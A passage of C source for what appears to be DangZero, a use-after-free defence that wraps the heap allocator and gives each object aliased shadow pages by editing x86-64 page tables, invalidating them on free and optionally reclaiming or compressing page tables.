PAGE_OFFSET); 392 | } 393 | 394 | static uintptr_t* get_table_page_L2cpt(uintptr_t* table, unsigned short index, bool *cpt) 395 | { 396 | // this assumes table == L2 (PD) 397 | uintptr_t page = *(table+index); 398 | if(page & PAGE_PRESENT){ 399 | *cpt = false; 400 | return (uintptr_t*)((page & PAGE_FRAME) + PAGE_OFFSET); 401 | } 402 | else if(page & PTE_COMPRESSED){ 403 | if(!(page & PTE_CMS_ONEBIG) && !(page & PTE_CMS_ALLSMALL)){ 404 | *cpt = true; 405 | return (uintptr_t*)((page & PTE_FRAME_CPT) + PAGE_OFFSET); 406 | } 407 | } 408 | 409 | *cpt = false; 410 | return NULL; 411 | } 412 | 413 | static uintptr_t* get_table_page_nocheck(uintptr_t* 
table, unsigned short index) 414 | { 415 | // here we assume the page is present... (nocheck) 416 | return (uintptr_t*)((*(table+index) & PAGE_FRAME) + PAGE_OFFSET); 417 | } 418 | 419 | phys_addr_t get_phys_addr_user(uintptr_t addr) 420 | { 421 | uintptr_t* page = g_cr3; 422 | phys_addr_t phys_page; 423 | unsigned short index; 424 | 425 | // level 4 426 | index = PML4_INDEX(addr); 427 | page = get_table_page(page, index); 428 | if(UNLIKELY(page == NULL)) return 0; 429 | 430 | // level 3 431 | index = PDPT_INDEX(addr); 432 | page = get_table_page(page, index); 433 | if(UNLIKELY(page == NULL)) return 0; 434 | 435 | // level 2 436 | index = PDE_INDEX(addr); 437 | page = get_table_page(page, index); 438 | if(UNLIKELY(page == NULL)) return 0; 439 | 440 | // phys page 441 | index = PTE_INDEX(addr); 442 | phys_page = *(page+index); 443 | if(UNLIKELY(!(phys_page & PAGE_PRESENT))) return 0; 444 | 445 | return phys_page; 446 | } 447 | 448 | uintptr_t* step_shadow_table_L2cpt(uintptr_t* table, unsigned short index) 449 | { 450 | // this assumes table == L2 (PD) 451 | uintptr_t* next_table; 452 | if(*(table+index) & PAGE_PRESENT){ 453 | next_table = get_table_page_nocheck(table, index); 454 | } 455 | else if(*(table+index) & PTE_COMPRESSED){ 456 | next_table = uncompress_pte(2, (pte_t*)(table+index)); 457 | } 458 | else{ 459 | // create new level 460 | next_table = create_page_table(table, index); 461 | } 462 | 463 | return next_table; 464 | } 465 | 466 | uintptr_t* step_shadow_table(uintptr_t* table, unsigned short index) 467 | { 468 | uintptr_t* next_table; 469 | if(!(*(table+index) & PAGE_PRESENT)){ 470 | next_table = create_page_table(table, index); 471 | } 472 | else{ 473 | next_table = get_table_page_nocheck(table, index); 474 | } 475 | return next_table; 476 | } 477 | 478 | 479 | int can_reclaim_pt(uintptr_t* pt) 480 | { 481 | unsigned short index; 482 | for(index = 0; index < 512; index++){ 483 | if(!(*(pt+index) & PTE_INVALIDATED)){ 484 | return 0; 485 | } 486 | } 487 | return 1; 488 | } 489 | 490 | 491 | void disable_shadow_one(uintptr_t addr) 492 | { 493 | // uintptr_t* page; 494 | uintptr_t *pdpt, *pde, *pte; 495 | unsigned short pml4_index, pdpt_index, pde_index, pte_index; 496 | 497 | // do a page walk to find PTE of addr 498 | 499 | // level 4 500 | pml4_index = PML4_INDEX(addr); 501 | pdpt = get_table_page(g_cr3, pml4_index); //pdpt=cr3+pml4_index 502 | if(UNLIKELY(pdpt == NULL)) return; 503 | 504 | // level 3 505 | pdpt_index = PDPT_INDEX(addr); 506 | pde = get_table_page(pdpt, pdpt_index); //pde=pdpt+pdpt_index 507 | if(UNLIKELY(pde == NULL)) return; 508 | 509 | // level 2 510 | pde_index = PDE_INDEX(addr); 511 | pte = get_table_page(pde, pde_index); //pte=pde+pde_index 512 | if(UNLIKELY(pte == NULL)) return; 513 | 514 | // level 1 515 | pte_index = PTE_INDEX(addr); 516 | 517 | // remove PAGE_PRESENT from the PTE 518 | *(pte+pte_index) = PTE_INVALIDATED; 519 | #ifdef __GC 520 | *(pte+pte_index) |= PTE_OBJEND; 521 | #endif 522 | 523 | //*(pte+index) &= ~(PAGE_PRESENT); // *pte+pte_index == pointer to PA 524 | 525 | // flush TLB 526 | asm volatile("invlpg (%0)" :: "r" (addr) : "memory"); 527 | 528 | //try_collect_pt(addr, 1); 529 | 530 | #if defined(__GC) && defined(__GC_PT_COMPRESS) 531 | try_compress_pt(addr, 1); 532 | #elif defined(__PT_RECLAIM) 533 | // PT RECLAIM 534 | if(can_reclaim_pt(pte)){ 535 | *(pde+pde_index) = PTE_INVALIDATED | PTE_ALIASSES; 536 | free_pages((unsigned long)pte, 0); 537 | #ifdef __TRACK_MEM_USAGE 538 | curr_pt_count--; 539 | #endif 540 | 
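// cascade one level up: freeing the PT above marked its entry in the page
// directory as invalidated; if that left every PD entry invalidated too, the
// PD page itself is returned to the kernel and its PDPT entry marked likewise.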
if(can_reclaim_pt(pde)){ 541 | *(pdpt+pdpt_index) = PTE_INVALIDATED | PTE_ALIASSES; 542 | free_pages((unsigned long)pde, 0); 543 | #ifdef __TRACK_MEM_USAGE 544 | curr_pt_count--; 545 | #endif 546 | } 547 | } 548 | #endif 549 | 550 | #ifdef __GC_WATERMARK 551 | invalidated_pages++; 552 | #endif 553 | 554 | } 555 | 556 | void disable_shadows(uintptr_t base, size_t num_pages) 557 | { 558 | uintptr_t *pdpt, *pde, *pte; 559 | unsigned short pml4_index, pdpt_index, pde_index, pte_index; 560 | #ifdef __GC 561 | uintptr_t saveaddr = base; 562 | #endif 563 | 564 | // page walk the first shadow 565 | // level 4 566 | pml4_index = PML4_INDEX(base); 567 | pdpt = get_table_page(g_cr3, pml4_index); 568 | if(UNLIKELY(pdpt == NULL)) return; 569 | 570 | // level 3 571 | pdpt_index = PDPT_INDEX(base); 572 | pde = get_table_page(pdpt, pdpt_index); 573 | if(UNLIKELY(pde == NULL)) return; 574 | 575 | // level 2 576 | pde_index = PDE_INDEX(base); 577 | pte = get_table_page(pde, pde_index); 578 | if(UNLIKELY(pte == NULL)) return; 579 | 580 | // level 1 581 | pte_index = PTE_INDEX(base); 582 | 583 | // remove PAGE_PRESENT from the PTE 584 | *(pte+pte_index) = PTE_INVALIDATED; 585 | //*(pte+pte_index) &= ~(PAGE_PRESENT); 586 | 587 | // flush TLB 588 | asm volatile("invlpg (%0)" :: "r" (base) : "memory"); 589 | 590 | // subsequent shadow pages are contiguous 591 | // if get_table_page fails (returns NULL) we need to cancel 592 | // this can only happen if something else disabled the shadow... 593 | 594 | size_t p; 595 | for(p = 1; p < num_pages; p++){ 596 | // move to next page table entry 597 | if(pte_index == MAX_PAGE_INDEX){ 598 | pte_index = 0; 599 | if(pde_index == MAX_PAGE_INDEX){ 600 | pde_index = 0; 601 | if(pdpt_index == MAX_PAGE_INDEX){ 602 | pdpt_index = 0; 603 | //if(pml4_index == PML4_SHADOW_END) // not on free 604 | pml4_index++; 605 | // update subsequent level pages (pdpt, pde, pte) 606 | pdpt = get_table_page(g_cr3, pml4_index); 607 | pde = get_table_page(pdpt, 0); 608 | pte = get_table_page(pde, 0); 609 | } 610 | else{ 611 | #ifdef __PT_RECLAIM 612 | // pte can already be reclaimed at this point 613 | if(can_reclaim_pt(pde)){ 614 | *(pdpt+pdpt_index) = PTE_INVALIDATED | PTE_ALIASSES; 615 | free_pages((unsigned long)pde, 0); 616 | #ifdef __TRACK_MEM_USAGE 617 | curr_pt_count--; 618 | #endif 619 | } 620 | #endif 621 | pdpt_index++; 622 | // update subsequent level pages (pde, pte) 623 | pde = get_table_page(pdpt, pdpt_index); 624 | pte = get_table_page(pde, 0); 625 | } 626 | } 627 | else{ 628 | #ifdef __PT_RECLAIM 629 | if(can_reclaim_pt(pte)){ 630 | *(pde+pde_index) = PTE_INVALIDATED | PTE_ALIASSES; 631 | free_pages((unsigned long)pte, 0); 632 | #ifdef __TRACK_MEM_USAGE 633 | curr_pt_count--; 634 | #endif 635 | } 636 | #endif 637 | pde_index++; 638 | // update subsequent level pages (pte) 639 | pte = get_table_page(pde, pde_index); 640 | } 641 | } 642 | else{ 643 | pte_index++; 644 | } 645 | 646 | // remove PAGE_PRESENT from the PTE 647 | *(pte+pte_index) = PTE_INVALIDATED; 648 | //*(pte+pte_index) &= ~(PAGE_PRESENT); 649 | #ifdef __GC 650 | if(p+1 == num_pages){ 651 | *(pte+pte_index) |= PTE_OBJEND; 652 | } 653 | #endif 654 | // flush TLB 655 | base += PAGE_SIZE; 656 | asm volatile("invlpg (%0)" :: "r" (base) : "memory"); 657 | } 658 | 659 | //try_collect_pt(saveaddr, num_pages); 660 | #if defined(__GC) && defined(__GC_PT_COMPRESS) 661 | try_compress_pt(saveaddr, num_pages); 662 | #elif defined(__PT_RECLAIM) 663 | // PT RECLAIM 664 | if(can_reclaim_pt(pte)){ 665 | *(pde+pde_index) = 
PTE_INVALIDATED | PTE_ALIASSES; 666 | free_pages((unsigned long)pte, 0); 667 | #ifdef __TRACK_MEM_USAGE 668 | curr_pt_count--; 669 | #endif 670 | if(can_reclaim_pt(pde)){ 671 | *(pdpt+pdpt_index) = PTE_INVALIDATED | PTE_ALIASSES; 672 | free_pages((unsigned long)pde, 0); 673 | #ifdef __TRACK_MEM_USAGE 674 | curr_pt_count--; 675 | #endif 676 | } 677 | } 678 | #endif 679 | 680 | #ifdef __GC_WATERMARK 681 | invalidated_pages += num_pages; 682 | #endif 683 | } 684 | 685 | uintptr_t* create_shadow_one(uintptr_t canon, size_t offset) 686 | { 687 | phys_addr_t phys_user; 688 | volatile int8_t tmp; // in case ptr is 1 byte? 689 | uintptr_t cur_shadow; 690 | 691 | #ifdef __GC 692 | struct vp_span *span; 693 | if(cur_span != NULL){ 694 | // any non-empty span is sufficient for 1 page 695 | span = cur_span; 696 | } 697 | else{ 698 | span = opt_freelist->items.lh_first; 699 | 700 | // if span == NULL we are completely OOM 701 | // assert(span != NULL); 702 | 703 | // update global cur_span 704 | if(cur_span != NULL){ 705 | // disable prev span sync 706 | cur_span->last_sync = false; 707 | } 708 | cur_span = span; 709 | } 710 | 711 | if(!span->last_sync){ 712 | update_span_last_ptrs(span); 713 | // TODO: skip initial entry++ 714 | } 715 | 716 | cur_shadow = span->start; 717 | span->start += PAGE_SIZE; 718 | if(span->start > highest_shadow) 719 | highest_shadow = span->start; 720 | 721 | if (span_empty(span)) { 722 | LOG("span %p is now empty, deallocating\n", span); 723 | LIST_REMOVE(span, freelist); 724 | #ifdef WM_ZERO 725 | span->start = 0; span->end = 0; 726 | #endif 727 | WM_FREE(span); 728 | // set global span to NULL 729 | cur_span = NULL; 730 | } 731 | #else 732 | cur_shadow = free_span.start; 733 | free_span.start += PAGE_SIZE; 734 | #endif 735 | 736 | // get next shadow entry 737 | if(_last_pte_index == MAX_PAGE_INDEX){ 738 | _last_pte_index = 0; 739 | if(_last_pde_index == MAX_PAGE_INDEX){ 740 | _last_pde_index = 0; 741 | if(_last_pdpt_index == MAX_PAGE_INDEX){ 742 | _last_pdpt_index = 0; 743 | // if last_pml4_index == PML4_SHADOW_END -> PANIC 744 | 745 | _last_pml4_index++; 746 | // update subsequent level pages (pdpt, pde, pte) 747 | _last_pdpt = step_shadow_table(g_cr3, _last_pml4_index); 748 | _last_pde = step_shadow_table(_last_pdpt, 0); 749 | #ifdef __GC_PT_COMPRESS 750 | _last_pte = step_shadow_table_L2cpt(_last_pde, 0); 751 | #else 752 | _last_pte = step_shadow_table(_last_pde, 0); 753 | #endif 754 | } 755 | else{ 756 | _last_pdpt_index++; 757 | // update subsequent level pages (pde, pte) 758 | _last_pde = step_shadow_table(_last_pdpt, _last_pdpt_index); 759 | #ifdef __GC_PT_COMPRESS 760 | _last_pte = step_shadow_table_L2cpt(_last_pde, 0); 761 | #else 762 | _last_pte = step_shadow_table(_last_pde, 0); 763 | #endif 764 | } 765 | } 766 | else{ 767 | _last_pde_index++; 768 | // update subsequent level pages (pte) 769 | #ifdef __GC_PT_COMPRESS 770 | _last_pte = step_shadow_table_L2cpt(_last_pde, _last_pde_index); 771 | #else 772 | _last_pte = step_shadow_table(_last_pde, _last_pde_index); 773 | #endif 774 | } 775 | } 776 | else{ 777 | _last_pte_index++; 778 | } 779 | 780 | // pre fault the page 781 | tmp = *(int8_t*)(canon); 782 | *(int8_t*)(canon) = tmp; 783 | 784 | // get the physical page belonging to the allocation 785 | phys_user = get_phys_addr_user(canon); 786 | 787 | // pte+pte_index now has to alias-point to the phys addr 788 | *(_last_pte+_last_pte_index) = (phys_user & PAGE_FRAME) | PAGE_PRESENT | PAGE_WRITABLE; 789 | 790 | // store the canonical page in malloc header at the 
start of the allocation 791 | *((uintptr_t*)(cur_shadow+offset)) = canon; 792 | 793 | #ifdef __GC_WATERMARK 794 | if(invalidated_pages >= __GC_WATERMARK){ 795 | invalidated_pages = 0; 796 | if(cur_span != NULL){ 797 | cur_span->last_sync = false; 798 | cur_span = NULL; 799 | } 800 | gc_run(); 801 | } 802 | #endif 803 | 804 | // return the shadow page with the original in-page offset and canon padding 805 | return (uintptr_t*) (cur_shadow + offset + sizeof(void*)); 806 | } 807 | 808 | uintptr_t* create_shadows(uintptr_t canon, size_t num_pages, size_t offset) 809 | { 810 | uintptr_t start_shadow; 811 | phys_addr_t phys_user; 812 | volatile uintptr_t canon_page = canon; 813 | int8_t tmp; 814 | 815 | #ifdef __GC 816 | struct vp_span *span; 817 | if(cur_span != NULL && span_num_pages(cur_span) >= num_pages){ 818 | span = cur_span; 819 | } 820 | else{ 821 | struct vp_freelist *list = opt_freelist; 822 | LIST_FOREACH(span, &list->items, freelist) { 823 | if (span_num_pages(span) >= num_pages) { 824 | break; 825 | } 826 | } 827 | 828 | // if span==NULL we are completely OOM 829 | // assert(span != NULL); 830 | 831 | if(cur_span != NULL){ 832 | // disable prev span sync 833 | cur_span->last_sync = false; 834 | } 835 | cur_span = span; 836 | } 837 | 838 | if(!span->last_sync){ 839 | update_span_last_ptrs(span); 840 | // TODO: skip initial entry++ 841 | } 842 | 843 | start_shadow = span->start; 844 | span->start += num_pages * PGSIZE; 845 | if(span->start > highest_shadow) 846 | highest_shadow = span->start; 847 | 848 | // LOG("satisfying %zu page alloc from span %p => 0x%lx\n", num_pages, span, start_shadow); 849 | 850 | if (span_empty(span)) { 851 | LOG("span %p is now empty, deallocating\n", span); 852 | LIST_REMOVE(span, freelist); 853 | #ifdef WM_ZERO 854 | span->start = 0; span->end = 0; 855 | #endif 856 | WM_FREE(span); 857 | cur_span = NULL; 858 | } 859 | #else 860 | start_shadow = free_span.start; 861 | free_span.start += (num_pages * PAGE_SIZE); 862 | #endif 863 | 864 | size_t p; 865 | for(p = 0; p < num_pages; p++){ 866 | 867 | // move to next page table entry 868 | if(_last_pte_index == MAX_PAGE_INDEX){ 869 | _last_pte_index = 0; 870 | if(_last_pde_index == MAX_PAGE_INDEX){ 871 | _last_pde_index = 0; 872 | if(_last_pdpt_index == MAX_PAGE_INDEX){ 873 | _last_pdpt_index = 0; 874 | // if last_pml4_index == PML4_SHADOW_END -> PANIC 875 | 876 | _last_pml4_index++; 877 | // update subsequent level pages (pdpt, pde, pte) 878 | _last_pdpt = step_shadow_table(g_cr3, _last_pml4_index); 879 | _last_pde = step_shadow_table(_last_pdpt, 0); 880 | #ifdef __GC_PT_COMPRESS 881 | _last_pte = step_shadow_table_L2cpt(_last_pde, 0); 882 | #else 883 | _last_pte = step_shadow_table(_last_pde, 0); 884 | #endif 885 | } 886 | else{ 887 | _last_pdpt_index++; 888 | // update subsequent level pages (pde, pte) 889 | _last_pde = step_shadow_table(_last_pdpt, _last_pdpt_index); 890 | #ifdef __GC_PT_COMPRESS 891 | _last_pte = step_shadow_table_L2cpt(_last_pde, 0); 892 | #else 893 | _last_pte = step_shadow_table(_last_pde, 0); 894 | #endif 895 | } 896 | } 897 | else{ 898 | _last_pde_index++; 899 | // update subsequent level pages (pte) 900 | #ifdef __GC_PT_COMPRESS 901 | _last_pte = step_shadow_table_L2cpt(_last_pde, _last_pde_index); 902 | #else 903 | _last_pte = step_shadow_table(_last_pde, _last_pde_index); 904 | #endif 905 | } 906 | } 907 | else{ 908 | _last_pte_index++; 909 | } 910 | 911 | // pre fault page 912 | tmp = *(int8_t*)(canon_page); 913 | *(int8_t*)(canon_page) = tmp; 914 | 915 | // get phys addr of the 
page 916 | phys_user = get_phys_addr_user(canon_page); 917 | 918 | // move canon page to the next one 919 | canon_page += PAGE_SIZE; 920 | 921 | // pte+pte_index now has to alias-point to the phys addr 922 | *(_last_pte+_last_pte_index) = (phys_user & PAGE_FRAME) | PAGE_PRESENT | PAGE_WRITABLE; 923 | } 924 | 925 | // store the canonical page in malloc header at the start of the allocation 926 | *((uintptr_t*)(start_shadow+offset)) = canon; 927 | 928 | #ifdef __GC_WATERMARK 929 | if(invalidated_pages >= __GC_WATERMARK){ 930 | invalidated_pages = 0; 931 | if(cur_span != NULL){ 932 | cur_span->last_sync = false; 933 | cur_span = NULL; 934 | } 935 | gc_run(); 936 | } 937 | #endif 938 | 939 | // return the shadow page with the original in-page offset and canon padding 940 | return (uintptr_t*) (start_shadow + offset + sizeof(void*)); 941 | } 942 | 943 | void* malloc(size_t size) 944 | { 945 | if(process) 946 | { 947 | // call the original malloc with padded size 948 | void* canon = __libc_malloc(size + sizeof(void*)); 949 | 950 | if(UNLIKELY(canon == NULL)) return NULL; 951 | 952 | // get the actual size of the allocated object (incl. alignment) 953 | const size_t usable_sz = malloc_usable_size(canon); 954 | 955 | // determine the offset of the object into its (first) page 956 | const size_t page_offset = (uintptr_t)canon & (PAGE_SIZE - 1); 957 | 958 | // determine how many pages the allocation spans 959 | const size_t num_pages = (usable_sz + page_offset - 1) / (PAGE_SIZE) + 1; 960 | 961 | // create shadow 962 | uintptr_t* shadow_result = NULL; 963 | if(num_pages == 1){ 964 | shadow_result = create_shadow_one((uintptr_t)canon, page_offset); 965 | } 966 | else{ 967 | shadow_result = create_shadows((uintptr_t)canon, num_pages, page_offset); 968 | } 969 | #ifdef __TRACK_SHADOW_SIZE 970 | nallocs++; 971 | if(nallocs % OUTPUT_FREQ == 0){ 972 | output_shadow_size(false); 973 | } 974 | #endif 975 | return (void*)shadow_result; 976 | } 977 | 978 | return __libc_malloc(size); 979 | } 980 | 981 | void* calloc(size_t nmemb, size_t size) 982 | { 983 | if(process) 984 | { 985 | size_t numadj = 0, sizeadj = 0; 986 | // minimal adjustment 987 | if(nmemb==1) 988 | sizeadj = sizeof(void*); 989 | else if(size <= sizeof(void*)) 990 | numadj = (sizeof(void*) + sizeof(void*)-1) / size; 991 | else{ 992 | // consider: 10x500 bytes vs 500x10 bytes 993 | if((nmemb+1)*size < nmemb*(size+sizeof(void*))) 994 | numadj = 1; 995 | else 996 | sizeadj = sizeof(void*); 997 | } 998 | 999 | // padding may be more than 8 bytes, but thats ok 1000 | void* canon = __libc_calloc(nmemb+numadj, size+sizeadj); 1001 | if(UNLIKELY(canon == NULL)) return NULL; 1002 | 1003 | // get the actual size of the allocated object (incl. 
alignment) 1004 | const size_t usable_sz = malloc_usable_size(canon); 1005 | 1006 | // determine the offset of the object into its (first) page 1007 | const size_t page_offset = (uintptr_t)canon & (PAGE_SIZE - 1); 1008 | 1009 | // determine how many pages the allocation spans 1010 | const size_t num_pages = (usable_sz + page_offset - 1) / (PAGE_SIZE) + 1; 1011 | 1012 | // create shadow 1013 | uintptr_t* shadow_result = NULL; 1014 | if(num_pages == 1){ 1015 | shadow_result = create_shadow_one((uintptr_t)canon, page_offset); 1016 | } 1017 | else{ 1018 | shadow_result = create_shadows((uintptr_t)canon, num_pages, page_offset); 1019 | } 1020 | #ifdef __TRACK_SHADOW_SIZE 1021 | nallocs++; 1022 | if(nallocs % OUTPUT_FREQ == 0){ 1023 | output_shadow_size(false); 1024 | } 1025 | #endif 1026 | return (void*)shadow_result; 1027 | } 1028 | return __libc_calloc(nmemb, size); 1029 | } 1030 | 1031 | void* realloc(void *ptr, size_t size) 1032 | { 1033 | if(process) 1034 | { 1035 | // if ptr == NULL, call is equivalent to malloc(size) 1036 | if(UNLIKELY(ptr==NULL)){ 1037 | return malloc(size); 1038 | } 1039 | 1040 | // if size == zero, and ptr is not NULL, call equivalent to free(ptr); 1041 | if(UNLIKELY(size == 0)){ 1042 | free(ptr); 1043 | return NULL; 1044 | } 1045 | #ifdef __SANITY_CHECK 1046 | if((uintptr_t)ptr < SHADOW_BASE || (uintptr_t)ptr >= SHADOW_END){ 1047 | //fprintf(fp, "fatal: ptr out of range: %p\n", ptr); 1048 | return __libc_realloc(ptr, size); 1049 | } 1050 | #endif 1051 | /* ptr mustve been obtained from malloc or calloc, so should be in shadow bounds anyway */ 1052 | 1053 | // get the canonical address 1054 | void* canon = (void*)(*(uintptr_t*)(ptr - sizeof(void*))); 1055 | 1056 | // get the size, offset, and number of pages of the old object 1057 | const size_t pre_usable_sz = malloc_usable_size(canon); 1058 | const size_t pre_page_offset = (uintptr_t)canon & (PAGE_SIZE - 1); 1059 | const size_t pre_num_pages = (pre_usable_sz + pre_page_offset - 1) / (PAGE_SIZE) + 1; 1060 | 1061 | void* recanon = __libc_realloc(canon, size + sizeof(void*)); 1062 | if(UNLIKELY(recanon == NULL)) return NULL; 1063 | 1064 | // get the size, offset, and number of pages of the new object 1065 | const size_t post_usable_sz = malloc_usable_size(recanon); 1066 | const size_t post_page_offset = (uintptr_t)recanon & (PAGE_SIZE - 1); 1067 | const size_t post_num_pages = (post_usable_sz + post_page_offset - 1) / (PAGE_SIZE) + 1; 1068 | 1069 | // NOTE: we cannot guarantee that we can extend the shadows in-place 1070 | // since this depends on the state of the shadows 1071 | // instead, we return a new shadow mapping 1072 | 1073 | // if realloc in place: check for identical or shrinking num pages 1074 | 1075 | if(canon == recanon){ 1076 | if(pre_num_pages > post_num_pages){ 1077 | // apply shrink 1078 | size_t num_remove = pre_num_pages - post_num_pages; 1079 | size_t startp = pre_num_pages - num_remove; 1080 | uintptr_t start_shadow = (uintptr_t)ptr + (startp * PAGE_SIZE); 1081 | 1082 | // disable the shadows that cover the shrinkage 1083 | if(num_remove == 1) 1084 | disable_shadow_one(start_shadow & PAGE_MASK); 1085 | else 1086 | disable_shadows(start_shadow & PAGE_MASK, num_remove); 1087 | return ptr; 1088 | } 1089 | else if(pre_num_pages == post_num_pages){ 1090 | // identical pages in-place, do nothing 1091 | return ptr; 1092 | } 1093 | } 1094 | 1095 | // disable the old shadow pages 1096 | uintptr_t first_shadow = (uintptr_t)ptr & PAGE_MASK; 1097 | if(pre_num_pages == 1){ 1098 | 
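// whether the old object spanned one page or many, its entire alias range is
// invalidated here, so stale pointers into the pre-realloc shadow mapping
// will fault; a fresh shadow range for the (possibly moved) canonical block
// is created just below.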
disable_shadow_one(first_shadow); 1099 | } 1100 | else{ 1101 | disable_shadows(first_shadow, pre_num_pages); 1102 | } 1103 | 1104 | // else: reallocation is extended / moved (canon is free). free old shadows & create new 1105 | uintptr_t* shadow_result = NULL; 1106 | if(post_num_pages == 1){ 1107 | shadow_result = create_shadow_one((uintptr_t)recanon, post_page_offset); 1108 | } 1109 | else{ 1110 | shadow_result = create_shadows((uintptr_t)recanon, post_num_pages, post_page_offset); 1111 | } 1112 | 1113 | #ifdef __TRACK_SHADOW_SIZE 1114 | nallocs++; 1115 | if(nallocs % OUTPUT_FREQ == 0){ 1116 | output_shadow_size(false); 1117 | } 1118 | #endif 1119 | return (void*)shadow_result; 1120 | } 1121 | return __libc_realloc(ptr, size); 1122 | } 1123 | 1124 | void free(void* ptr) 1125 | { 1126 | if(process) 1127 | { 1128 | // printf("[DangZero]: Free Shadow @ %p (cr3=%p)\n", ptr, g_cr3); 1129 | 1130 | #ifdef __SANITY_CHECK 1131 | if((uintptr_t)ptr < SHADOW_BASE || (uintptr_t)ptr >= SHADOW_END){ 1132 | //printf("[!!] request free non-shadow %p\n", ptr); 1133 | __libc_free(ptr); 1134 | return; 1135 | } 1136 | #else 1137 | if(UNLIKELY(ptr==NULL)){ 1138 | return; 1139 | } 1140 | #endif 1141 | 1142 | void* canon = (void*)(*(uintptr_t*)(ptr - sizeof(void*))); 1143 | 1144 | // find out how many shadow pages were created for object 1145 | const size_t usable_sz = malloc_usable_size(canon); 1146 | const size_t page_offset = (uintptr_t)canon & (PAGE_SIZE - 1); 1147 | const size_t num_pages = (usable_sz + page_offset - 1) / (PAGE_SIZE) + 1; 1148 | 1149 | // disable the shadow pages 1150 | uintptr_t first_shadow = (uintptr_t)ptr & PAGE_MASK; 1151 | if(num_pages == 1){ 1152 | disable_shadow_one(first_shadow); 1153 | } 1154 | else{ 1155 | disable_shadows(first_shadow, num_pages); 1156 | } 1157 | #ifdef __GC 1158 | // zero out 1159 | memset(canon, 0, usable_sz); 1160 | #endif 1161 | // free the original canonical object 1162 | __libc_free(canon); 1163 | 1164 | return; 1165 | } 1166 | 1167 | __libc_free(ptr); 1168 | } 1169 | 1170 | int posix_memalign(void **memptr, size_t alignment, size_t size) 1171 | { 1172 | if(process) 1173 | { 1174 | *memptr = malloc(size); 1175 | if(*memptr != NULL) return 0; 1176 | return 12; // ENOMEM 1177 | } 1178 | return __posix_memalign(memptr, alignment, size); 1179 | } 1180 | 1181 | void* memalign(size_t alignment, size_t size) 1182 | { 1183 | if(process) 1184 | { 1185 | return malloc(size); 1186 | } 1187 | return __libc_memalign(alignment, size); 1188 | } 1189 | 1190 | void __attribute__((destructor)) exit_unload() 1191 | { 1192 | if(process) 1193 | { 1194 | #ifdef __GC 1195 | // run GC once at the end 1196 | // gc_run(); 1197 | #endif 1198 | // printf("[DangZero]: Destructor exit\n"); 1199 | //fprintf(stderr, "[dangzero] destructor entry\n"); 1200 | //fflush(stderr); 1201 | 1202 | #ifdef __TRACK_MEM_USAGE 1203 | #ifdef __NGINX_MODE 1204 | struct rusage u; 1205 | if(getrusage(RUSAGE_SELF, &u) == 0){ 1206 | printf("[mem-usage] ru_maxrss %lu\n", u.ru_maxrss); 1207 | } 1208 | printf("[mem-usage] max_pt_count %lu\n", max_pt_count); 1209 | printf("[mem-usage] curr_pt_count %lu\n", curr_pt_count); 1210 | fflush(stdout); 1211 | #else 1212 | fprintf(stderr, "[setup-report] max_pt_count: %lu\n", max_pt_count); 1213 | fprintf(stderr, "[setup-report] curr_pt_count: %lu\n", curr_pt_count); 1214 | // fprintf(stderr, "[setup-report] maxrss_seen: %ld\n", maxrss_seen); 1215 | fprintf(stderr, "[setup-report] end rusage-counters\n"); 1216 | fflush(stderr); 1217 | #endif 1218 | #endif 1219 | 1220 | 
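// tear down the shadow page-table hierarchy: walk every PML4 slot from
// PML4_SHADOW_START up to the slot covering the highest shadow address handed
// out, returning each PT/PD/PDPT table page to the kernel via free_pages() so
// the alias mappings do not outlive the process.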
#ifdef __GC 1221 | uint64_t end_addr = highest_shadow; 1222 | #else 1223 | uint64_t end_addr = free_span.start; 1224 | #endif 1225 | unsigned short pml4_index = PML4_SHADOW_START; 1226 | unsigned short pdpt_index = 0, pde_index = 0; 1227 | unsigned short end_pml4 = PML4_INDEX(end_addr); 1228 | unsigned short end_pdpt = PDPT_INDEX(end_addr); 1229 | unsigned short end_pde = PDE_INDEX(end_addr); 1230 | uintptr_t *pdpt, *pde, *pte; 1231 | #if defined(__GC) && defined(__GC_PT_COMPRESS) 1232 | bool cpt = false; 1233 | #endif 1234 | 1235 | // main loop: exhaust all entries 1236 | while(pml4_index < end_pml4){ 1237 | pdpt = get_table_page(g_cr3, pml4_index); 1238 | if(pdpt == NULL) { pml4_index++; continue; } 1239 | pdpt_index = 0; 1240 | while(pdpt_index <= MAX_PAGE_INDEX){ 1241 | pde = get_table_page(pdpt, pdpt_index); 1242 | if(pde == NULL) { pdpt_index++; continue; } 1243 | pde_index = 0; 1244 | while(pde_index <= MAX_PAGE_INDEX){ 1245 | #if defined(__GC) && defined(__GC_PT_COMPRESS) 1246 | pte = get_table_page_L2cpt(pde, pde_index, &cpt); 1247 | #else 1248 | pte = get_table_page(pde, pde_index); 1249 | #endif 1250 | if(pte == NULL) { pde_index++; continue; } 1251 | #if defined(__GC) && defined(__GC_PT_COMPRESS) 1252 | // if compressed and page aligned 1253 | if(cpt && (((uintptr_t)pte & 0xfff)==0)) 1254 | #endif 1255 | free_pages((unsigned long)pte, 0); 1256 | pde_index++; 1257 | } 1258 | free_pages((unsigned long)pde, 0); 1259 | pdpt_index++; 1260 | } 1261 | free_pages((unsigned long)pdpt, 0); 1262 | pml4_index++; 1263 | } 1264 | 1265 | // last pml4: pml4_index == end_pml4 1266 | pdpt = get_table_page(g_cr3, pml4_index); 1267 | if(pdpt != NULL) { 1268 | pdpt_index = 0; 1269 | while(pdpt_index <= end_pdpt){ // only till end 1270 | pde = get_table_page(pdpt, pdpt_index); 1271 | if(pde == NULL) { pdpt_index++; continue; } 1272 | pde_index = 0; 1273 | while(pde_index <= MAX_PAGE_INDEX){ // slight over approx 1274 | #if defined(__GC) && defined(__GC_PT_COMPRESS) 1275 | pte = get_table_page_L2cpt(pde, pde_index, &cpt); 1276 | #else 1277 | pte = get_table_page(pde, pde_index); 1278 | #endif 1279 | if(pte == NULL) { pde_index++; continue; } 1280 | #if defined(__GC) && defined(__GC_PT_COMPRESS) 1281 | // if compressed and page aligned 1282 | if(cpt && (((uintptr_t)pte & 0xfff)==0)) 1283 | #endif 1284 | free_pages((unsigned long)pte, 0); 1285 | pde_index++; 1286 | } 1287 | free_pages((unsigned long)pde, 0); 1288 | pdpt_index++; 1289 | } 1290 | free_pages((unsigned long)pdpt, 0); 1291 | } 1292 | 1293 | #ifdef __GC 1294 | // return the memory of freelist structures 1295 | /*if(g_freelist != NULL){ 1296 | for(int i = 0; i < NUM_BUCKETS; i++){ 1297 | if(g_freelist[i].items.lh_first != NULL) 1298 | { 1299 | freelist_reset(&g_freelist[i]); 1300 | } 1301 | } 1302 | __libc_free(g_freelist); 1303 | }*/ 1304 | 1305 | if(opt_freelist != NULL && 